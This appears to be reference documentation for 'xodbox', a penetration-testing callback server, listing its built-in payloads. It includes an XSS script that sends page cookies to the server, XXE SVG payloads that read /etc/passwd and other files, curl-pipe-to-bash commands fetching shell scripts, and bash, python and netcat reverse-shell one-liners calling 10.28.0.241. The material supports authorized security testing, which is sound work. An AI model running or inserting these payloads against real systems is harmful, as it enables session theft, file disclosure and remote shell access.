Default Payloads Seeds

• 1: Default Header
• 2: Redirect
• 3: Robots TXT
• 4: Inspect
• 5: XSS HTML
• 6: XSS JavaScript
• 7: Default Favicon
• 8: HTML Iframe
• 9: Open Graph
• 10: XXE Callback
• 11: XXE DTD
• 12: XXE SVG Hostname
• 13: XXE SVG Passwd
• 14: XXE SVG Request Params
• 15: XXE System
• 16: Default Page
• 17: In Development Seeds
• 17.1: Build MDaaS
• 17.2: Bind Shell
• 17.3: BusyBox Reverse Shell
• 17.4: Detect platform
• 17.5: List Payloads
• 17.6: Reverse Shell
• 17.7: Simple SSH
• 17.8: Simple SSH Service
• 17.9: WPAD

1 - Default Header

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

2 - Redirect

HTTP Redirects to the query parameter l using the query param s as the status code.

Example Request

curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"

Example Response

Location: https://github.com/defektive/xodbox

3 - Robots TXT

Simple robots txt to prevent indexing.

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

4 - Inspect

Depends on an internal code

/inspect

Inspect or reflect the request back in various formats.

• Plain Text (default, .txt)
• HTML (.html, .html)
• GIF (.gif)
• JPEG (.jpg)
• PNG (.png)
• MP4 (.mp4)
• XML (.xml)
• JSON (.json)
• Javascript (.js)

Examples

• http://localhost/inspect
• http://localhost/some/random/path/inspect.gif

5 - XSS HTML

/jsc.html

Simple HTML to load simple JS Payload.

6 - XSS JavaScript

/jsc

Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.

(function (){
    var s = document.createElement("img");
    document.body.appendChild(s);
    s.src="//{{.Request.Host}}/jscb?src="+window.location+"&c="+document.cookie;
})()

7 - Default Favicon

Redirects to the embedded default logo, exposed via embedded fs.

Example Request

curl -i http://xodbox.test/favicon.ico

8 - HTML Iframe

/ht

Iframe callback

9 - Open Graph

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"

Example Response

Location: https://github.com/defektive/xodbox

10 - XXE Callback

XXE Callback used by xxe-system

11 - XXE DTD

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

/evil.dtd

dtd for use by others

12 - XXE SVG Hostname

/sh

attempts to get /etc/hostname

SVG with XXE payloads

13 - XXE SVG Passwd

/sp

attempts to get /etc/passwd

14 - XXE SVG Request Params

/sv

attempts to get whatever files is supplied via the f query parameter

15 - XXE System

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

16 - Default Page

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

hi

17 - In Development Seeds

Seeds that are not tested or finished.

17.1 - Build MDaaS

17.2 - Bind Shell

curl xodbox/bind.sh|bash

17.3 - BusyBox Reverse Shell

List Payloads

# bash
    bash -i >& /dev/tcp/10.28.0.241/9091 0>&1
    0<&196;exec 196<>/dev/tcp/10.28.0.241/9091; sh <&196 >&196 2>&196
    /bin/bash -l > /dev/tcp/10.28.0.241/9091 0<&1 2>&1

#python

    import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.28.0.241",9091));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
#busybox nc
  rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.28.0.241 9092 >/tmp/f

17.4 - Detect platform

17.5 - List Payloads

17.6 - Reverse Shell

17.7 - Simple SSH

curl xodbox/ssh.sh|bash

17.8 - Simple SSH Service

17.9 - WPAD

WPAD Proxy. Not really useful at the moment. Should be more useful in the future